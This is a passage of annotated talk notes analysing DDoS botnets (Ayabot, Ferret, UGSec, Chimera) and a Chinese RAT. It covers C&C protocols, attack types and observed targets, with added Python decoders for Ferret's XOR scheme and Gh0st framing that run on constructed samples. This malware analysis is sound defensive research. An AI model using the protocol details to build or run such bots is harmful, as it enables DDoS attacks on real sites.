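    except (binascii.Error, ValueError):
        return None


def peel_base64(blob: bytes, max_layers: int = MAX_LAYERS):
    """Return (payload, layers_removed) after unwrapping repeated base64.

    Stops when the current value is not valid base64 (e.g. the second-stage
    URL, which has ':' and '.') or when one more decode would yield
    non-printable bytes, so an inner plain token made only of base64-alphabet
    characters is not destroyed by decoding one layer too many.
    """
    current = blob.strip()
    layers = 0
    while layers < max_layers:
        decoded = _strict_b64decode(current)
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break
        current = decoded.strip()
        layers += 1
    return current, layers


def wrap_base64(payload: bytes, layers: int) -> bytes:
    """Encode `payload` `layers` times (used to construct sample input)."""
    for _ in range(layers):
        payload = base64.b64encode(payload)
    return payload


# Constructed sample: a second-stage URL wrapped three times, as in the notes.
SAMPLE_URL = b"http://stage2.example.invalid/gate.php?id=1"
SAMPLE_REDIRECT = wrap_base64(SAMPLE_URL, 3)

if __name__ == "__main__":
    url, layers = peel_base64(SAMPLE_REDIRECT)
    print(f"{layers} layers removed -> {url.decode()}")
```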
  56. The second stage is a ping.
  57. This is the cleaned up version of the ping query and response. It returns a hash. The hash is checked against a hardcoded value in the binary; this seems to be a client side authentication mechanism or checksum.
  58. Next up is the bot registration.
  59. Again, the query and response cleaned up. The registration is a standard phone home with computer name, CPU, memory, Windows version, etc. The response is an id number.
  60. And finally, command polling.
  61. Here it is cleaned up. The query sends the id it got from registration, bot name, bot version, and an unknown field. And the bot command is returned.
  62. The attack types are again from the basic suite. I assure you that there are plenty of DDoS bots that implement more than just the basic suite of attacks. We should get to one here in a few minutes…
  63. These are the C&Cs I’m tracking, kind of all over the place. I believe these are a mixture of bullet proof hosted sites and hacked sites, as some of the C&Cs have been alive and active since the start and some have died quickly. I would say the former sites use the redirection option, and they redirect to the short lived, hacked sites that provide the bot commands. @NO_UPDATE
      python src/get_at_long_by_tag.py ayabot > ayabot.csv
  64. Here are the attack commands seen from them. @NO_UPDATE
      \o ayabot
      select cmd from ddos_commands where cc_channel='ayabot';
      \o
      cut -d '|' -f 1 ayabot | sort | uniq -c | sort -nr
  65. The countries targeted based on geo IP. Russia and Romania are on top. @NO_UPDATE
      select target_cc, count(*) from ddos_commands where cc_channel='ayabot' group by target_cc order by count(*) desc;
  66. And some of the observed targets.Picture blogNewspaperNews blogPizza/Sushi restaurantChildren’s clothing manufacturerBuilding materials companyAnti corruption website@NO_UPDATEselect target_host, count(*) from ddos_commands where cc_channel='blackrev' group by target_host order by count(*) desc;
  67. While googling around for this bot and campaign, I stumbled across this link which was a chat system.Surprisingly someone joined and I was able to have a impromptu interview with AreYouAreDo.Vasilis Zebedee was the name that the TOR browser filled in for me, so that’s me typing.
  68. Here are some snippets that I found interesting:On distribtionBased on this, I’m guessing he does not distribute via exploit kitsOn advertisingGoogle adwords I assumeOn how he got startedOn how much money he makesOn hacking
  69. At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.This also makes sense why he implements a client side authentication into Ayabot, maybe to prevent some from taking over his botnet.
  70. On customers and attacks – I suppose this goes along with the corrupt countries he mentionedOn handling money – unsure what gamesAnd I believe Russia just recently banned bitcoin…And finally on Anti-DDoS companiesHe told me about 1 company which I looked up. They do look like a legit anti-DDoS company, but who knows if they really sell a booter service as well.At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.Also makes sense why he implements a client side authentication in Ayabot, to prevent someone taking over his bot.
  71. Attack-wise, this this botnet has slowed down a bit recently, but I continue to monitor this bot and it was last seen circa February 2014
  72. My fourth bot is Trojan.FerretI wrote a blog on this family a few weeks ago, but wanted to talk about it here to provide some updates.
  73. This was first seen circa November 2013.It came on my radar from this tweet by @malpush.
  74. Russian in origin
  75. And of course, Delphi.
  76. This is Ferret bot's panel login. The ferret icon and theme cracked me up. It also reminded me of a French DDoS bot I was trying to track down…
  77. Called Angry Cat. But I never was able to find a binary sample of Angry Cat, so Ferret was a suitable replacement. If anyone does have a sample of Angry Cat, I'd love a copy.
  78. Here is the statistics page. Based on some comments from a thread on the kernelmode forum, the Ferret panel is based on another bot's panel called N0pe… I took a quick look at N0pe and it does look like the panel is similar, but the bot itself differs from Ferret; I believe it was written in C# and not Delphi. This campaign has close to 2500 bots, so not large, but not small either.
  79. Here's a sampling of the bot list. As you can see from the flag icons, it's gotten around…
  80. Ferret is actively being developed. Since it was discovered I've seen 4 versions.
  81. It's actively being distributed by the trojan downloader networks. In early February I started seeing an Andromeda botnet dropping it. On a cursory look this campaign was also dropping Dirtjumper samples, so maybe a DDoS-focused trojan dropper network… I haven't had the opportunity to explore this relationship further, so if anybody is currently tracking Andromeda, I'd love to chat.
  82. Ferret uses 2 encryption routines, one for C&C communication and one for strings. This Python function decrypts the C&C comms, and it's a combination of base64 and XOR. Over the course of development they've continued to use the same XOR key, the number 8. So that's been thoughtful of them.
  83. This Python function decrypts the strings, and it is again a combination of base64 and XOR. Likewise, over the development, they used the following 2 keys for string encryption.
  84. There is an exception to their key reuse rule. The key used to encode the C&C host details has been unique. Here is a sampling from a handful of samples. Based on the format it is likely generated from some sort of base64-based builder or keygen.
  85. Here's what the C&C phone home looks like. It is an HTTP POST based C&C. The POST data contains standard phone home data. The "m" field contains the message type, and 0 is for "phone home".
  86. An interesting feature of Ferret is that if it detects it is running in a VM, being debugged, or messed with in other ways, it generates a fake phone home. The POST content will be legit, but the host, URL and User-Agent will be fake. The fake domains may make for an interesting sinkhole opportunity, but I haven't explored that yet.
  87. Speaking of User-Agents, it is used as some form of an authentication method. As can be seen here, the phone home response is the User-Agent sent in the original request.
  88. Here is a sampling of User-Agents. Mozilla Gecko is pretty consistent and further indicates there is likely a builder in play, or they just like the Gecko UA.
  89. Message type 1 is for command polling.
  90. This is what a command looks like. The fields are delimited by '*'s and indicate port, timing, etc.
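The C&C decryption routine from slide 82 and the '*'-delimited command format from slide 90 are not reproduced in this transcript, so here is an added example of both (my code, not the author's Python or anything from Ferret itself). It undoes the base64-then-XOR encoding with the single-byte key 8 the notes describe, shows how to confirm the key on a new build from a known plaintext prefix, and tallies polled commands by their first '*' field, the same count the `cut | sort | uniq -c` pipeline later in the notes produces. The sample commands, their attack names and every field after the first are constructed assumptions; only "first field = attack type" and the delimiter come from the notes.

```python
import base64
from collections import Counter

# Single-byte XOR key the notes say Ferret kept for C&C traffic across versions.
CC_XOR_KEY = 8


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the 'obfuscation' most DDoS bots use)."""
    return bytes(b ^ key for b in data)


def ferret_decode(blob: bytes, key: int = CC_XOR_KEY) -> bytes:
    """Undo Ferret's C&C encoding: base64 on the outside, XOR on the inside."""
    return xor_bytes(base64.b64decode(blob), key)


def ferret_encode(plain: bytes, key: int = CC_XOR_KEY) -> bytes:
    """Inverse of ferret_decode; used here only to construct sample traffic."""
    return base64.b64encode(xor_bytes(plain, key))


def recover_xor_key(blob: bytes, crib: bytes):
    """Brute-force a one-byte XOR key from a known plaintext prefix (crib),
    e.g. an attack name already seen in the panel. Returns None if no key fits."""
    raw = base64.b64decode(blob)
    for key in range(256):
        if xor_bytes(raw[: len(crib)], key) == crib:
            return key
    return None


# Constructed sample commands in the '*'-delimited shape described in the notes.
# Attack names, field order and values are assumptions for this example, not
# fields recovered from Ferret; hosts and addresses are documentation ranges.
SAMPLE_COMMANDS = [
    b"http*target.example.invalid*80*10*60",
    b"http*shop.example.invalid*80*10*60",
    b"udp*198.51.100.7*53*5*30",
    b"tcp*198.51.100.7*443*5*30",
    b"http*news.example.invalid*80*10*60",
]
ENCODED_COMMANDS = [ferret_encode(c) for c in SAMPLE_COMMANDS]


def tally_attack_types(encoded_cmds, key: int = CC_XOR_KEY) -> Counter:
    """Decode each polled command and count its first '*' field: the Python
    equivalent of `cut -d '*' -f 1 ferret | sort | uniq -c | sort -nr`."""
    return Counter(
        ferret_decode(c, key).split(b"*")[0].decode("ascii", errors="replace")
        for c in encoded_cmds
    )


if __name__ == "__main__":
    print("key:", recover_xor_key(ENCODED_COMMANDS[0], b"http*"))
    print(tally_attack_types(ENCODED_COMMANDS).most_common())
```

The crib approach is the practical check when a new Ferret build lands: one decoded command with a known attack name pins the key in a few milliseconds, which is far cheaper than reversing the routine again, and it fails loudly (returns None) if the author finally changes the scheme.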
  91. Attack types are again from the basic suite: HTTP floods, UDP floods, TCP floods.
  92. These are the C&C locations I’m tracking.
  93. Most of the attacks I've seen from these C&Cs have been HTTP floods. For a while it was just HTTP floods, but recently I started seeing a UDP and TCP flood in the mix.
  @NO_UPDATE
  malware=> \o ferret
  malware=> select cmd from ddos_commands where cc_channel='ferret';
  malware=> \o
  cut -d '*' -f 1 ferret | sort | uniq -c | sort -nr
  94. Targeted countries based on geo IP: Germany and Russia are on top.
  @NO_UPDATE
  95. Here's a sampling of targets. Here we have: the Vice President of Panama, Juan Carlos Varela; an electronics company; a wedding dress store; a watch store; real estate sites; political news blogs; a money exchanger; a carding forum; and a gaming site.
  96. Ferret continues to be active; I last saw it on February 15, 2014.
  @UPDATE
  97. Trojan.UGSec is the obligatory Hack Forums bot. While a lot of researchers think themselves above researching Hack Forums malware, I find it interesting because: there is a lot of activity there; it does occasionally produce significant threats (for example, I'd argue Betabot is one); and malware in general tends to trickle down there.
  98. First seen mid 2013.
  99. From the US.
  http://en.wikipedia.org/wiki/File:USA_orthographic.svg
  100. And it’s written in C++
  101. Here is the Hack Forums advert
  102. Pretty professional looking…
  103. And the pricing: 30-50 dollars. I didn't look very closely, but there might be an interesting bitcoin money trail from UGSec's author. The sales thread had a lot of "vouches" and likely many purchases.
  104. Speaking of the author, he goes by the handle "Bionic". He's very active on Hack Forums, 1100+ posts as can be seen in his profile.
  105. As is sort of par for the course for Hack Forums though, he practices poor OPSEC and I was able to track him down in a few minutes. That's another nice thing about HF: it tends to be fairly easy to find malware/campaign attribution details.
  106. The main reason I wanted to profile this bot is to show that in the DDoS malware sub-culture, IRC is still very common. Even in 2014.
  107. Attack types. Chargen here does not refer to the port 19 service, but just a payload of random characters.
  108. The samp command is interesting because instead of just being a TCP or UDP flood on the gaming port, it actually tries to implement the Grand Theft Auto protocol.
  109. I haven’t seen much from this bot since August.
  110. My second to last malware is Trojan.Chimera
  111. First seen in July of last year
  112. I believe it is Bulgarian in origin.
  http://upload.wikimedia.org/wikipedia/commons/thumb/e/e9/EU-Bulgaria.svg/500px-EU-Bulgaria.svg.png
  113. This is based on the language detected by Google Translate on Chimera's login screen. This translates to "authorization".
  114. It is written in C++
  115. Naming-wise, its name comes from the embedded program database pathname. These PDB strings are great. While I know some folks/vendors disagree, I prefer to name malware by its given name when possible. It makes classifying and comparing research far easier.
  116. Some of Chimera's source code, or at least what it was based on, can be found on pastebin. This paste just shows some skeleton code though. It was posted circa November 2013.
  117. Like a few of the other bots, Chimera uses an optional C&C redirection feature, this time using ICQ. Here is an example profile with the second stage C&C URL embedded in the About Me field.
  118. It uses a standard HTTP GET based command poll.
  119. And this is what a response looks like: a very nicely detailed XML-like file. The text outside of the tags is documentation notes that aren't parsed by the bot, but helpful nonetheless.
  120. Here are the attack types. You'll note that this bot has an attack from the Layer 7 suite, as promised earlier ;) A nice slowloris attack.
  121. I'm tracking just a handful of C&Cs. To be honest, I have just recently started monitoring Chimera, so I don't have too much data yet.
  122. So far I’ve only seen slowloris attacks.
  123. The attacks have been against a few targets in the US.
  select target_cc,count(*) from ddos_commands where cc_channel='chimera' group by target_cc;
  124. And here they are. Most of the attacks have been against this porn site.
  select target_host,count(*) from ddos_commands where cc_channel='chimera' group by target_host;
  125. Chimera is still somewhat active. I last saw it in February.
  126. As I mentioned earlier, mcorral bubbles up potentially new and interesting DDoS malware samples for further human analysis. Sometimes the automatic heuristics get it wrong and a sample turns out to be more than DDoS.
  127. Usually a strings hit like the above that isn't already classified as an existing malware family is a good indicator of a new DDoS bot.
  128. But in this case it turned out to be a new (to me and my network of researchers at least) Chinese RAT with no DDoS capabilities. I've dubbed it Zuguo, and even though it's not DDoS related I wanted to take a few slides to present my research to see if anyone here at DCC was familiar with it. SIMPLE_DDOS turned out to be the C&C communications crypto key.
  129. Zuguo uses a multi-staged C&C protocol. The first stage is an optional redirection where it looks for URLs on a webpage tagged with a "zuguo" sentinel. If found, it strips this part and connects to the host/port over a persistent TCP connection. So far, I've only found 2 of these redirects; both have been sina.com.cn blogs, and both point back at the same IP. And I've only been able to track down 1 second stage C&C, this 222 IP.
  130. The second stage C&C is encrypted with Blowfish using the SIMPLE_DDOS key and LZO compression. Once decrypted, the phone home is fairly standard.
  131. The last 4 fields of the phone home come from Zuguo's configuration, which is stored in the registry. They are the Remark, Group, PassWord, and Version values. This screenshot shows the complete configuration. The base64 encoded Config value contains the stage 1 and stage 2 C&C addresses.
  132. Pivoting from this solo stage 2 C&C IP got me to Trojan.DrAgOn. Here's what DrAgOn looks like on the wire.
  133. It may look familiar to some of you, as it is a Gh0st RAT variant. It uses the standard Gh0st RAT C&C binstruct protocol with zlib compression. Here is some quick Python that cleans it up some.
  134. This is what it looks like decompressed.
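The "quick Python" mentioned on slide 133 is not in this transcript, so here is an added example (mine, not the author's script) that parses the Gh0st-style framing the notes refer to: a 5-byte flag, a little-endian total frame length, a little-endian uncompressed length, then a zlib stream. The flag value b"Gh0st" is the one from the public Gh0st 3.x source; the notes do not give DrAgOn's actual flag, so it is a parameter here, and the structural check is written so a renamed flag still gets spotted. The sample stream and its payload bytes are constructed.

```python
import struct
import zlib

# Gh0st framing as in the public 3.x source: 5-byte flag, total frame length,
# uncompressed payload length (both little-endian uint32), then a zlib stream.
# 13 bytes of header in all.
HEADER = struct.Struct("<5sII")
ZLIB_MAGIC = b"\x78"  # first byte (CMF) of every zlib stream


def build_frame(payload: bytes, flag: bytes = b"Gh0st") -> bytes:
    """Frame a payload the way the bot does; used here only to construct sample traffic."""
    body = zlib.compress(payload)
    return HEADER.pack(flag, HEADER.size + len(body), len(payload)) + body


def looks_like_gh0st_frame(data: bytes) -> bool:
    """Cheap structural check that survives variants which rename the flag
    (DrAgOn, and the many other Gh0st forks): sane lengths plus a zlib header
    immediately after the 13-byte frame header. Useful as a triage signature."""
    if len(data) < HEADER.size + 2:
        return False
    _flag, total, orig = HEADER.unpack_from(data)
    return (
        HEADER.size < total <= len(data)
        and orig < 64 * 1024 * 1024  # sanity bound, an arbitrary assumption
        and data[HEADER.size:HEADER.size + 1] == ZLIB_MAGIC
    )


def parse_stream(stream: bytes, flag: bytes = b"Gh0st"):
    """Split a reassembled TCP stream into frames and return the decompressed
    payloads, refusing frames whose lengths or flag do not add up."""
    payloads = []
    offset = 0
    while offset + HEADER.size <= len(stream):
        f, total, orig = HEADER.unpack_from(stream, offset)
        if f != flag:
            raise ValueError(f"unexpected flag {f!r} at offset {offset}")
        if total < HEADER.size or offset + total > len(stream):
            raise ValueError(f"bad frame length {total} at offset {offset}")
        payload = zlib.decompress(stream[offset + HEADER.size:offset + total])
        if len(payload) != orig:
            raise ValueError(f"decompressed size {len(payload)} != header {orig}")
        payloads.append(payload)
        offset += total
    return payloads


# Constructed sample: two frames back to back, as they would appear in a
# reassembled stream. Payload content is made up; in Gh0st the first byte of a
# payload is a message token, but the values used here are placeholders.
SAMPLE_STREAM = build_frame(b"\x66CONSTRUCTED-HOST\x00") + build_frame(b"\x65")


if __name__ == "__main__":
    print(looks_like_gh0st_frame(SAMPLE_STREAM))
    for p in parse_stream(SAMPLE_STREAM):
        print(p)
```

Checking the decompressed length against the header is worth keeping: it is the quickest way to notice that a sample is not quite standard Gh0st (a changed header layout, an extra field, a different compressor) before spending time on the payload itself.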
  135. Pivoting from Trojan.DrAgOn got me to FireEye's Sunshop campaign.
  136. Another link between Zuguo and Sunshop is the use of signed binaries. Here's Zuguo's valid certificate, issued to a company I can't pronounce. While this certificate wasn't listed in FireEye's report on Sunshop, they did indicate that using signed binaries is one of Sunshop's MOs. And that's where my trail got more or less cold. I'm hoping someone has some further insight on either Zuguo or DrAgOn; if you do, please reach out.
  137. Finishing up, these are some personal trend and takeaway thoughts, mostly based on empirical evidence.
  138. This is a breakdown of languages we see in DDoS malware, roughly from most to least. As mentioned a few times in this talk, Delphi usually means Russians. Brobot put PHP on the DDoS malware map, but pastebin and other similar sites are flooded with various Perl, PHP, and Python DDoS bot scripts. Java isn't particularly popular in the DDoS world; my first run-in was actually a few weeks ago trying to track down Kaspersky's un-named Trojan.jbot variant they blogged about at the end of January.
  139. As an aside on Visual Basic: reversing it sucks and I hate it. If you've reversed VB, I trust you feel my pain.
  140. This is a review of the C&C types we see. I think I covered most of these with the bots presented. Unfortunately, I don't have stats on what the distribution among these is, but if I had to guess: HTTP 40%, binstruct 20%, IRC 20%, ASCII 20%.
  141. These are the types of crypto we see. In general, DDoS malware does not use strong crypto. Again, I don't have stats, but XOR-based obfuscation is definitely the most common and can almost be assumed to be the default.
  142. While I think most of the bots I presented in this talk implemented attacks from the basic suite of DDoS attacks, I did want to show that the more advanced attacks are used in the wild. This is a chart from our monitoring system across all monitored DDoS botnet families, showing (manually normalized) attack command data. As can be seen, Slowloris, RUDY, etc. are indeed used in the wild, albeit not as much as the generic HTTP floods. The "Other" category includes unknown commands, other IP protocols, combo attacks, and "smart" (redirect following/cookie parsing) HTTP attacks that try to bypass some anti-DDoS countermeasures.
  143. Some final miscellaneous thoughts on DDoS malware. It's a copy and paste culture: a lot of copying and pasting is going on, especially in the Chinese variants, and this can make it extremely difficult to categorize some families. I have a theory that Chinese computer science programs require students to create their own Gh0st RAT variant as a senior project or something. Lots of broken attack implementations: for example, most implementations of slowloris aren't slow at all and turn into a normal HTTP flood. I feel like a lot of the bot families try to implement too many attacks; it's not uncommon to see multiple UDP floods, multiple TCP floods, etc. where 1 of each would likely do.
  144. DNS amplification attacks are slowly making their way into DDoS botnets. As mentioned earlier, most DNS amplification attacks don't really need the support of a botnet, but we're slowly seeing them integrated. With its current popularity, I assume we'll start seeing the same integration with NTP amplification. The above 2 points remind me of a comment a colleague, Jeff Edwards, made. When the Slowloris and Apache Killer research and proof of concept code became public, there was definitely a noticeable delay before we started seeing those attacks being implemented in botnets. Even when they started implementing them, they were fairly broken and didn't really work. I think we're seeing something similar here with the amplification attacks, but instead of new research, the catalyst is how much press these attacks can generate.
  145. And that's what I have for you. If you have any questions, comments, or feedback, I'm available. Thanks much for listening!